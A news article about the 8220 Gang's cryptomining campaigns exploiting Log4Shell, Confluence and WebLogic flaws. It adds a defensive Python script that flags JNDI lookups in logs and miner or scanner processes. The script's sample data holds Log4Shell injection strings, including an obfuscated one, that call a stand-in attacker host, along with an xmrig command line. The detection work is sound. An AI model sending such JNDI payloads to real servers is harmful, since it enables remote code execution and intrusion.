Recently, a group of hackers from China, known as “8220 Gang”, has intensified its attacks on cloud infrastructure, targeting both Linux and Windows users for illegal cryptocurrency mining.
The latest series of attacks, observed from May 2023 to February 2024, demonstrates significant advancements in the tactics of the 8220 Gang and poses an increased threat to cloud security globally.
According to a recent report by Uptycs, the cybercriminals are exploiting well-known critical vulnerabilities such as CVE-2021-44228 (rated 10.0 on the CVSS scale) and CVE-2022-26134 (rated 9.8 on the CVSS scale) to breach cloud systems and gain unauthorized access.
Furthermore, the group has also targeted an older vulnerability in Oracle WebLogic, CVE-2017-3506, which allows them to remotely execute arbitrary commands and carry out malicious activities.
These attacks have wide-ranging implications for organizations that rely on cloud infrastructure for their operations. The evolving tactics of the 8220 Gang highlight the growing capabilities of cybercriminals and underscore the importance of increased vigilance and enhanced security measures.
The group utilizes tools like Tsunami, XMRIG, MASSCAN, and Spirit to conduct unauthorized cryptocurrency mining on compromised systems, posing significant risks to their integrity and performance.
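As an added illustration of what a defender can check for, the following Python script is not from the Uptycs report or the article; it runs two simple detections that follow from the indicators named above. The first looks for the `${jndi:` lookup string that CVE-2021-44228 exploitation attempts leave in logged request fields (including the common `${lower:j}` / `${::-j}` wrapper obfuscations, which are unwrapped before matching); the second scans a process listing for the tool names mentioned in the article (xmrig, masscan, tsunami) and, as an assumed heuristic, for CPU-heavy processes executing out of `/tmp`. All log lines and process entries are constructed sample data, and the thresholds are assumptions to tune for your environment.

```python
import re

# Constructed sample access-log lines (not real traffic). Lines 3 and 4 carry
# a Log4Shell-style JNDI lookup in the User-Agent field; line 4 uses the
# ${lower:j} wrapper trick to hide the literal "jndi" string.
SAMPLE_ACCESS_LOG = [
    '203.0.113.5 - - [10/Jan/2024:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.6 - - [10/Jan/2024:10:00:02 +0000] "GET /login HTTP/1.1" 200 1024 "-" "curl/8.0"',
    '198.51.100.9 - - [10/Jan/2024:10:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '198.51.100.9 - - [10/Jan/2024:10:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:rmi://attacker.example/b}"',
]

# Constructed sample process listing in the style of `ps -eo pid,pcpu,comm,args`.
# "cputask" is an invented name standing in for a renamed miner binary.
SAMPLE_PROCESSES = [
    {"pid": 812, "cpu": 0.3, "comm": "sshd", "args": "/usr/sbin/sshd -D"},
    {"pid": 2231, "cpu": 97.5, "comm": "xmrig", "args": "./xmrig -o pool.example:3333 -u wallet"},
    {"pid": 2410, "cpu": 12.0, "comm": "masscan", "args": "masscan --rate 1000 -p 80 10.0.0.0/8"},
    {"pid": 2502, "cpu": 91.0, "comm": "cputask", "args": "/tmp/.x/cputask"},
]

# Wrappers used to obfuscate the lookup: ${lower:X}, ${upper:X} and ${::-X}
# each resolve to the single character X at lookup time.
_CASE_WRAPPER = re.compile(r"\$\{(?:lower|upper):([^{}])\}", re.IGNORECASE)
_DEFAULT_WRAPPER = re.compile(r"\$\{::-([^{}])\}")
JNDI_LOOKUP = re.compile(r"\$\{jndi:")


def normalize_lookup(text: str) -> str:
    """Strip nested single-character wrappers until the text stops changing,
    then lower-case it, so obfuscated lookups match the plain pattern."""
    prev = None
    while prev != text:
        prev = text
        text = _CASE_WRAPPER.sub(lambda m: m.group(1).lower(), text)
        text = _DEFAULT_WRAPPER.sub(lambda m: m.group(1), text)
    return text.lower()


def find_log4shell_probes(lines):
    """Return the 1-based indices of log lines containing a JNDI lookup."""
    return [n for n, line in enumerate(lines, 1) if JNDI_LOOKUP.search(normalize_lookup(line))]


# Tool names taken from the article; the CPU threshold and /tmp path check
# are assumed heuristics, not indicators from the report.
KNOWN_TOOLS = {"xmrig", "masscan", "tsunami"}
CPU_THRESHOLD = 80.0


def flag_processes(procs):
    """Return (pid, reason) pairs for processes matching a known tool name or
    the high-CPU-from-/tmp heuristic."""
    findings = []
    for p in procs:
        name = p["comm"].lower()
        args = p["args"].lower()
        if name in KNOWN_TOOLS or any(tool in args.split() for tool in KNOWN_TOOLS):
            findings.append((p["pid"], "known tool name"))
        elif p["cpu"] >= CPU_THRESHOLD and args.startswith("/tmp/"):
            findings.append((p["pid"], "high CPU process running from /tmp"))
    return findings


if __name__ == "__main__":
    for n in find_log4shell_probes(SAMPLE_ACCESS_LOG):
        print(f"log line {n}: JNDI lookup in request")
    for pid, reason in flag_processes(SAMPLE_PROCESSES):
        print(f"pid {pid}: {reason}")
```

On real systems, feed `find_log4shell_probes` the web or application log and `flag_processes` the parsed output of `ps`; the unwrapping step matters because a plain `jndi` string match misses the wrapped variants, as the fourth sample line shows.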
As the 8220 Gang continues to refine its strategies, cybersecurity professionals must proactively identify and counter new threats to mitigate risks effectively.
It is crucial for organizations worldwide to prioritize cloud security and implement robust protection measures to safeguard their digital assets from groups like the 8220 Gang and similar attackers.